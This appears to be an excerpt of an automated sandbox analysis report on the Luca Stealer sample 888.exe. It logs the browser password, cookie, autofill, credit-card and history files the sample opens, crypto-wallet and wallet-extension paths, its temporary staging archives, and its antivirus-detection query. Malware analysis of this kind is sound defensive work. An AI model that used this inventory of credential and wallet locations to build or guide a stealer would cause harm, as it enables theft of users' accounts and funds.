                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\screen1.png VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\sensitive-files.zip VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\user_info.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Passwords\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\History\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Downloads\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\CreditCards\Firefox_Firefox.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Chrome_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Edge_Default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Chrome_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Edge_Default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\w3EVsD5xxWlaOTT2srpBOMt1bbJzhJ\Autofill\Firefox_qnq0haq7.default.txt VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeQueries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\888.exeCode function: 0_2_012D73D3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_012D73D3
                    Source: C:\Users\user\Desktop\888.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Luca Stealer
                    Source: Yara matchFile source: 888.exe, type: SAMPLE
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.0.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.888.exe.f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2711187553.0000000000974000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2711187553.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710106623.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2711570869.0000000000BF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2709905866.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710305791.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710305791.0000000000973000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710106623.000000000095D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2710587236.000000000099B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2709905866.000000000094F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 888.exe PID: 5752, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: 888.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: 888.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: 888.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                    Source: 888.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                    Source: 888.exeString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: 888.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\keystore\
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\58ef9818-5ea1-49a0-b5b0-9338401a7943\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
